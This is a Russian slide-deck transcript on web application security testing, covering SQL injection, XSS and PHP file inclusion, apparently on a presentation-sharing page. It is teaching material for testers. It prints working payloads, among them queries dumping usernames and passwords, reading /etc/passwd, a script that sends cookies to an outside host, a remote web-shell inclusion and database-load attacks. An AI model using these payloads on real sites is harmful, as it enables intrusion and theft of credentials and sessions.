Ähnlich wie Тестирование защищенности веб-приложений (20)

PT MIFI Labsql
PT MIFI LabsqlPT MIFI Labsql
PT MIFI Labsql
 
PT Hackday#2
PT Hackday#2PT Hackday#2
PT Hackday#2
 
Advanced Sql Injection
Advanced Sql InjectionAdvanced Sql Injection
Advanced Sql Injection
 
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
 
CC HackQuest 2010 Full Disclosure (мастер-класс)
CC HackQuest 2010 Full Disclosure (мастер-класс)CC HackQuest 2010 Full Disclosure (мастер-класс)
CC HackQuest 2010 Full Disclosure (мастер-класс)
 
Web application security (RIT 2014, rus)
Web application security (RIT 2014, rus)Web application security (RIT 2014, rus)
Web application security (RIT 2014, rus)
 
Тестирование программных фильтров безопасности
Тестирование программных фильтров безопасностиТестирование программных фильтров безопасности
Тестирование программных фильтров безопасности
 
PT MIFI Labsql
PT MIFI LabsqlPT MIFI Labsql
PT MIFI Labsql
 
Методы обхода Web Application Firewall
Методы обхода Web Application FirewallМетоды обхода Web Application Firewall
Методы обхода Web Application Firewall
 
Александр Коротин. Безопасность систем управления турбинами в электроэнергетике
Александр Коротин. Безопасность систем управления турбинами в электроэнергетикеАлександр Коротин. Безопасность систем управления турбинами в электроэнергетике
Александр Коротин. Безопасность систем управления турбинами в электроэнергетике
 
PT Hackday#2
PT Hackday#2PT Hackday#2
PT Hackday#2
 
безопасность веб приложений сегодня. дмитрий евтеев. зал 4
безопасность веб приложений сегодня. дмитрий евтеев. зал 4безопасность веб приложений сегодня. дмитрий евтеев. зал 4
безопасность веб приложений сегодня. дмитрий евтеев. зал 4
 
Безопасность веб-приложений сегодня
Безопасность веб-приложений сегодняБезопасность веб-приложений сегодня
Безопасность веб-приложений сегодня
 
Web осень 2013 лекция 9
Web осень 2013 лекция 9Web осень 2013 лекция 9
Web осень 2013 лекция 9
 
Алексей Андросов - Debugger: Отладка кода
Алексей Андросов - Debugger: Отладка кодаАлексей Андросов - Debugger: Отладка кода
Алексей Андросов - Debugger: Отладка кода
 
Безопасность Drupal сайтов
Безопасность Drupal сайтовБезопасность Drupal сайтов
Безопасность Drupal сайтов
 
Svyatoslav Login
Svyatoslav LoginSvyatoslav Login
Svyatoslav Login
 
Тестирование на проникновение в сетях Microsoft (v.2)
Тестирование на проникновение в сетях Microsoft (v.2)Тестирование на проникновение в сетях Microsoft (v.2)
Тестирование на проникновение в сетях Microsoft (v.2)
 
Производительность в Django
Производительность в DjangoПроизводительность в Django
Производительность в Django
 
Взломать сайт на ASP.NET
Взломать сайт на ASP.NETВзломать сайт на ASP.NET
Взломать сайт на ASP.NET
 

Mehr von SQALab

Mehr von SQALab (20)

Готовим стажировку
Готовим стажировкуГотовим стажировку
Готовим стажировку
 
Куда приводят мечты? или Искусство развития тестировщика
Куда приводят мечты? или Искусство развития тестировщикаКуда приводят мечты? или Искусство развития тестировщика
Куда приводят мечты? или Искусство развития тестировщика
 
Оптимизация Selenium тестов и ускорение их поддержки
Оптимизация Selenium тестов и ускорение их поддержкиОптимизация Selenium тестов и ускорение их поддержки
Оптимизация Selenium тестов и ускорение их поддержки
 
Автоматизация 0.0: 0 - бюджет, 0 - опыт программирования
Автоматизация 0.0: 0 - бюджет, 0 - опыт программированияАвтоматизация 0.0: 0 - бюджет, 0 - опыт программирования
Автоматизация 0.0: 0 - бюджет, 0 - опыт программирования
 
Нагрузочное тестирование нестандартных протоколов с использованием Citrix и J...
Нагрузочное тестирование нестандартных протоколов с использованием Citrix и J...Нагрузочное тестирование нестандартных протоколов с использованием Citrix и J...
Нагрузочное тестирование нестандартных протоколов с использованием Citrix и J...
 
Continuous performance testing
Continuous performance testingContinuous performance testing
Continuous performance testing
 
Конфиги вместо костылей. Pytestconfig и зачем он нужен
Конфиги вместо костылей. Pytestconfig и зачем он нуженКонфиги вместо костылей. Pytestconfig и зачем он нужен
Конфиги вместо костылей. Pytestconfig и зачем он нужен
 
Команда чемпионов в ИТ стихии
Команда чемпионов в ИТ стихииКоманда чемпионов в ИТ стихии
Команда чемпионов в ИТ стихии
 
API. Серебряная пуля в магазине советов
API. Серебряная пуля в магазине советовAPI. Серебряная пуля в магазине советов
API. Серебряная пуля в магазине советов
 
Добиваемся эффективности каждого из 9000+ UI-тестов
Добиваемся эффективности каждого из 9000+ UI-тестовДобиваемся эффективности каждого из 9000+ UI-тестов
Добиваемся эффективности каждого из 9000+ UI-тестов
 
Делаем автоматизацию проектных KPIs
Делаем автоматизацию проектных KPIsДелаем автоматизацию проектных KPIs
Делаем автоматизацию проектных KPIs
 
Вредные привычки в тест-менеджменте
Вредные привычки в тест-менеджментеВредные привычки в тест-менеджменте
Вредные привычки в тест-менеджменте
 
Мощь переполняет с JDI 2.0 - новая эра UI автоматизации
Мощь переполняет с JDI 2.0 - новая эра UI автоматизацииМощь переполняет с JDI 2.0 - новая эра UI автоматизации
Мощь переполняет с JDI 2.0 - новая эра UI автоматизации
 
Как hh.ru дошли до 500 релизов в квартал без потери в качестве
Как hh.ru дошли до 500 релизов в квартал без потери в качествеКак hh.ru дошли до 500 релизов в квартал без потери в качестве
Как hh.ru дошли до 500 релизов в квартал без потери в качестве
 
Стили лидерства и тестирование
Стили лидерства и тестированиеСтили лидерства и тестирование
Стили лидерства и тестирование
 
"Давайте не будем про качество"
"Давайте не будем про качество""Давайте не будем про качество"
"Давайте не будем про качество"
 
Apache.JMeter для .NET-проектов
Apache.JMeter для .NET-проектовApache.JMeter для .NET-проектов
Apache.JMeter для .NET-проектов
 
Тестирование геолокационных систем
Тестирование геолокационных системТестирование геолокационных систем
Тестирование геолокационных систем
 
Лидер или босс? Вот в чем вопрос
Лидер или босс? Вот в чем вопросЛидер или босс? Вот в чем вопрос
Лидер или босс? Вот в чем вопрос
 
От Зефира в коробке к Structure Zephyr или как тест-менеджеру перекроить внут...
От Зефира в коробке к Structure Zephyr или как тест-менеджеру перекроить внут...От Зефира в коробке к Structure Zephyr или как тест-менеджеру перекроить внут...
От Зефира в коробке к Structure Zephyr или как тест-менеджеру перекроить внут...
 

Тестирование защищенности веб-приложений

  • 1. Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co.
  • 2. Зачем нужно тестировать защищенность • 90% сайтов опасны для пользователей и представляют угрозу бизнесу. • 43% сайтов не могут хранить конфиденциальную информацию в БД. • 80% Вебмастеров не обновляют opensource продукты вовремя. • 99,9% сайтов, которые имеют уязвимость, имеют еще несколько уязвимостей. • 48% серверов имеют уязвимости на уровне операционной системы и приложений.
  • 3. SQL Injection • Внедрение SQL-кода — один из распространѐнных способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода.
  • 4.
  • 5. Что может получить злоумышленник
  • 6.
  • 8. Простейший способ обнаружить уязвимость Добавляем одинарную кавычку к запросу: • http://www.site.com/?id=1‘ Получаем ошибку типа: • Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/mysite/www/htdocs/include/lib/news.php Или • Видим ту же самую страницу что и по ссылке http://www.site.com/?id=1
  • 9. Почему так происходит? query = "SELECT * FROM news WHERE id = '" + id + "'" SELECT * FROM news WHERE id = '1''
  • 10. Какие еще есть способы проверки? • Использование простых арифметических операций в запросе: • site.com/index.php?id=2-1(Выводит страницу 1) • site.com/index.php?id=1*2(Выводит страницу 2) • site.com/index.php?id=1+and+1=1(Выводит страницу 1) • Использование сортировки в запросе: • site.com/index.php?showthread=285+ORDER+BY+1--+ • Подстановка бессмысленной информации в запрос • site.com/index.php?id=1 anything (Выводит сообщение об ошибке)
  • 11. Как этим пользоваться? /?id=1' UNION SELECT user,password FROM users-- SELECT title,text FROM news WHERE id = '1' SELECT title,text FROM news WHERE id = '1' UNION SELECT user,password FROM users
  • 12. Blind SQL injection • Тестирование истинных и ложных запросов: • site.com/index.php?id=2’ AND ‘1’ = ‘1’-- • site.com/index.php?id=2’ AND ‘1’=‘2’-- • Вывод информации в отчете об ошибках: • site.com/index.php?id=2’ OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY MID(VERSION(), FLOOR(RAND(0)*2), 64)) -- Duplicate entry '5.0.45' for key 1
  • 13. Double-blind injection • Посимвольный перебор с помощью Benchmark: • site.com/index.php?id=2’ OR id= IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, BENCHMARK(2999999,MD5(NOW()))) – • Способ навредить серверу БД: • site.com/index.php?id=2’ AND BENCHMARK(100000, BENCHMARK(100000,md5(current_time)))
  • 14. На что еще обращать внимание? • URL: http://www.google.com/search?q=inurl:select+inurl:%2520+inurl:from+inurl:whe re
  • 15. Практика, или SQL Injection глазами злоумышленника 1. Определение типа базы данных 2. Проверка прав пользователя на запись файлов 3. Подбор количества столбцов 4. Определение вывода на экран 5. Получение информации о таблицах 6. Получение информации о колонках в требуемой таблице 7. Получение данных из таблицы и вывод на экран
  • 16. Ошибки характерные для разных видов баз данных PostgreSQL Access MS SQL InterBaseFire Oracle Sybase bird Функции: [Microsoft][ODB [Microsoft][ODB ibase_query() ORA-01756 Sybase error pg_exec() C Microsoft C SQL Server ibase_fetch_obj (И вообще sybase_query() pg_numrows() Access Driver] Driver] ect() всякие ORA) sybase_num_ro или ws() Microsoft JET Database Engine error
  • 17. Подбор количества столбцов 1. Простой перебор допустим у нас есть сайт с инъекцией: www.site.com/index.php?id=1‘ Выполняем такой запрос www.site.com/index.php?id=-1+UNION+SELECT+1,2,3 -- если появилась ошибка, то увеличиваем количество колонок на одну www.site.com/index.php?id=-1+UNION+SELECT+1,2,3,4 -- и так пока не исчезнет ошибка и появится пустая страница
  • 18. 2. Оператор ORDER BY www.site.com/index.php?id=-1+order+by+1-- ошибки нет, значит столбцов 1 или больше 1 www.site.com/index.php?id=-1+order+by+9999-- должна появится ошибка, значит столбцов меньше 9999 Далее подбираем таким образом правильное количество, предположим в нашем случае 4 столбца, тогда: www.site.com/index.php?id=-1+order+by+4-- (ошибки не будет) www.site.com/index.php?id=-1+order+by+5-- (ошибка есть)
  • 19. Определение вывода Предположим мы подобрали количество столбцов и их оказалось 4 www.site.com/index.php?id=-1+union+select+null,null,null,null Теперь нас интересует в какой части страницы, какая колонка выводится. Для этого подставим вместо одного из null – произвольный набор символов, в нашем случае «111» www.site.com/index.php?id=-1+union+select+null,111,null,null--
  • 20. Получаем информацию о версии и пользователе Для получения информации о текущем пользователе используется функция user() www.site.com/index.php?id=-1+union+select+null,user(),null,null-- Для определения версии используется функция version() www.site.com/index.php?id=-1+union+select+null,user(),null,null--
  • 21. Чтение и запись файлов Проверка возможности чтения/записи файлов: www.site.com/index.php?id=- 1+union+select+null,file_priv,null,null+union+select+file_priv+from+ mysql.user+where+user= ‘%USERNAME%'-- Чтение файла www.site.com/index.php?id=- 1+union+select+null,file_priv,null,null+union+select+ union+select+LOAD_FILE('/etc/passwd')+from+mysql.user--
  • 22. Узнаем таблицы Для получения информации о таблицах и колонках необходимо обратиться к служебной таблице Information_schema www.site.com/index.php?id=- 1+union+select+null,TABLE_NAME,null,null+from+INFO RMATION_SCHEMA.TABLES-- Таким запросом мы узнаѐм первую таблицу, но нам надо узнать и другие www.site.com/index.php?id=- 1+union+select+null,TABLE_NAME,null,null+from+INFO RMATION_SCHEMA.TABLES+LIMIT+1+OFFSET+1--
  • 23. Получаем информацию о колонках Перебрав таблицы, определяем ту которая нам будет интересна. Пусть это будет USER, что требуется для получения информации о колонках: www.site.com/index.php?id=-1+union+select+null,COLUMN_NAME,null,null+from+INF ORMATION_SCHEMA.COLUMNS-- Таким обрfзом мы выводим названия колонок всех таблиц. Но нам надо узнать имена колонок именно в таблице USER Изменяем немного наш запрос добавляя в него оператор WHERE: www.site.com/index.php?id=-1+union+select+null,COLUMN_NAME,null,null+from+INF ORMATION_SCHEMA.COLUMNS+where+TABLE_NAME='user'-- Появится имя первой колонки в таблице user и далее добавляя LIMIT+OFFSET узнаём все колонки.
  • 24. Фильтрация кавычек Чаще всего, проделав действия описанные на предыдущем слайде, вы увидите ошибку: ERROR: syntax error at or near "user" at character 122 http://www.paulschou.com/tools/xlate/ www.site.com/index.php?id=- 1+union+select+null,COLUMN_NAME,null,null+from+INF ORMATION_SCHEMA.CO LUMNS+where+TABLE_NAME=chr(117)| |chr(115)||chr(101)||chr(114)--
  • 25. Фильтрация кавычек Второй способ: использование вложенного подзапроса www.site.com/index.php?id=- 1+union+select+null,COLUMN_NAME,null,null+from+INF ORMATI ON_SCHEMA.COLUMNS+where+TABLE_NAME=(select+TABLE_ NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1+offset+ 1)--
  • 26. Фильтация пробелов В случае фильтрации пробелов существуют следующий способы обхода фильтра: 1. Использование пробельных символов «/*!*/» и «/**/» SELECT * FROM news WHERE id='1'/**/UNION/**/SELECT/**/1,2,3,4,5,6/**/FROM/**/Users/**/WHERE/**/login='admi n'#‘ или SELECT * FROM news WHERE id='1'/*!UNION*/SELECT/*!1,2,3,4,5,6*/FROM/*!Users*/WHERE/*!login='admin'*/#' 2. Использование символов табуляции: %09 – табуляция %0A – символ новой строка %0D – возврат каретки %0B – вертикальная табуляция %0C – символ новой страницы http://xxx/news.php?id=1'%09UNION%09SELECT%091,2,3,4,5,6%09FROM%09Users% 0 9WHERE%09login='admin'#
  • 27. Получение информации из таблицы Составляем запрос: www.site.com/index.php?id=- 1+union+select+null,username,null,null+from+user-- Он возвратит нам в данном случае имя пользователя Можно объединять 2 и более колонки разделяя их спец символом www.site.com/index.php?id=- 1+union+select+null,username||chr(58)||email,null, null+from+user-- Мы увидим запись типа Login:email
  • 28. Уязвимость в скрипте авторизации Поле ввода имени пользователя: • Username’-- Поле ввода пароля: • 123' OR login='Admin' – • %
  • 30. Программы для работы с инъекциями • SQL InjectMe – плагин для Firefox • Absinthe – утилита для проведения атак типа SQL Injection • SQL checker – анализатор возможности внедрения SQL кода
  • 31. XSS XSS (Сross Site Sсriрting — «межсайтовый скриптинг») — тип уязвимости интерактивных информационных систем в вебе. XSS возникает, когда в генерируемые сервером страницы по какой-то причине попадают пользовательские скрипты.
  • 32. XSS
  • 33. XSS • Цель Выполнить «чужеродный» JavaScript-код в браузере клиента, когда он находится на атакуемом сайте • Как это сделать? Внедрить куда-нибудь фрагмент кода типа <script>...</script> <a onmouseover="..."/> <img src="javascript:..."/>
  • 34. Классификация XSS • Активный XSS – Внедренный скрипт сохраняется в системе и становится доступен для вывода другим пользователям • Пассивный XSS – Скрипт передается системе в параметрах HTTP-запроса с последующим их выводом в HTML-страницу.
  • 35. Чем мы рискуем? • Кража Cookies var іmg = new Image(); іmg.srс = 'http://site/xss.php?' + document.cookie; • Кража аутентификационных данных – добавление обработчика события onsubmit к существующей форме – добавление формы с просьбой ввести пароль • Перенаправление пользователя на страницы злоумышленников • DDOS атаки
  • 36. Метод обнаружения /?id="><script>alert(1)</script> HTML - код страницы примет вид .. <font size = ""><script>alert(1)</script>"... В результате браузер выполнит скрипт.
  • 37. Типичный случай Самая распространенная разновидность XSS: "><script>alert()</script> Вся суть в "> После добавления к форме "><script>alert()</script> какой-то переменной присваивается значение поля. Переменная обрабатывается, "> закрывает скрипт и выполняет <script>alert()</script>
  • 38.
  • 39. Фильтры: определяем наличие и качество В любое поле вводим проверочную строку: '';!--"<XSSTEST>=&{()} Далее открываем HTML страницы, ищем слово "XSSTEST" и смотрим на прилегающие к нему символы. • Если символы <> остались – это первый признак наличия уязвимости • Если символы ,"' остались такими, как были введены – это второй признак уязвимости (возможно использование дополнительных символов в последующей XSS атаке) • Если в HTML, вы не обнаружили <> - это признак отсутствия фильтрации. • Если открыв HTML вы обнаружили, что <> заменены на другие символы – фильтр функционирует нормально.
  • 40. Практика • Допустим фильтр экранирует <> В этом случае существует вероятность обхода фильтра. К примеру, фильтр настроен на удаление <script>,<> и . Для проверки используем конструкцию типа <testxss555> и проверяем, если фильтр не удалил запись - можно составить XSS-скрипт. К примеру вот так: <sc<script>ript>alert()</sc</script>ript>
  • 41. Автозакрывающиеся скобки: >>>><<script бывает, что фильтр подсчитывает открывающиеся и закрывающиеся скобки и закрывает сам. Автозакрытие тегов: Бывает что фильтр дополняет скрипт, к примеру вот этим : "> http://site.ru/trye.asp?sessionID="><IMG%20SRC="javascript:alert(); Фильтр проверяет, что ничего опасного в <IMG%20SRC="javascript:alert(); нет, закрывает тег и тем самым выполняет вредоносный скрипт.
  • 42. Кража Cookies До этого мы рассматривали скрипты типа: <script>alert (' Test ')</script> javascript:alert (' Test ')/ javascript:alert(' Test ')/1.jpg и так далее.. Теперь рассмотрим следующий скрипт: <script> img = new Image(); img.src = "http://test.com/s/Hack.gif?"+document.cookie; </script> В данном виде скрипт перехватывает cookies пользователя.
  • 43. Как воспользоваться этим скриптом? 1. http://site.ru/free?p='><script>img=new Image();img.src="http://test.com/s/Hack.gif?"+document.cookie;"+document.cookie;</ script> 2. http://site.ru/free?p='><script src=http://test.com/script/js.js></script> При этом файл js.js содержит: img=new Image();img.src="http://test.com/s/Hack.gif?"+document.cookie; этот способ более надѐжен.
  • 44. Изменение кодировки http://ha.ckers.org/xss.html Изначально скрипт выглядел так: http://cite.com/test?p='><script src=http://test.com/script/js.js></script> После: %68%74%74%70%3A%2F%2F%63%69%74%65%2E%63%6F%6D%2F%74%6 5%73%74%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%7 2%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%6E%65%7 4%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%7 3%63%72%69%70%74%3E%0A
  • 45. DDoS-атака XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста — много запросов, которые не выдерживает атакуемый сервер. Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида: <img src="http://site.com/">
  • 47. Инструменты для обнаружения XSS • XSSme – аддон для Firfox • DOMinator – анализатор наличия DOM-based XSS
  • 48. PHP Injection PHP Injection или создание веб шеллов – это второй по популярности после SQL инъекции тип уязвимостей.
  • 49. Уязвимые функции • Eval() • Include() • Require() • Create_function() • Preg_replace()
  • 50. Виды инклудов <? .. Include ("$page.php"); … ?> Возможен Remote File Inclusion (RFI) <? .. Include ("files/$page.htm"); … ?> Возможен Local File Inclusion (LFI) с использованием нулл байта <? .. Include ("$patch/folder/page.php"); … ?> Возможен RFI при условии создания структуры /folder/page.php на удаленном сервере
  • 51. Метод определения уязвимости • index.php?page=shop Подставим dsdsds вместо shop: Warning: main(dsdsds.php): failed to open stream: No such file or directory in /home/user/www//page.php on line 3 Warning: main(dsdsds.php): failed to open stream: No such file or directory in /home/user/www/page.php on line 3 Warning: main(): Failed opening 'dsdsds.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php:/usr/local/share/pear') in /home/user/www/page.php on line 3
  • 52. Веб шелл Это происходит потому, что код страницы имеет такой элемент <? .. Include ("$page.php"); … ?> Как этим воспользоваться? index.php?page=http://hacker.site/shell Получаем веб шелл, который дает возможность исполнять любые php команды
  • 53. Выход за пределы текущего каталога Apache Tomcat 5 версии ниже 5.5.22 и Apache Tomcat 6 ниже 6.0.10 подвержен уязвимости поволяющей перейти к содержимому вышестоящей директории путем указания в пути конструкции "../".
  • 54. Инструменты для обнаружения • Graudit - семантически-статический анализатор кода • RIPS – утилита для поискам уязвимостей в PHP коде
  • 56. Вопросы? Email: bondarenko.ihar@yandex.ru Twitter: @iharbondarenko Skype: igor.bondarenko1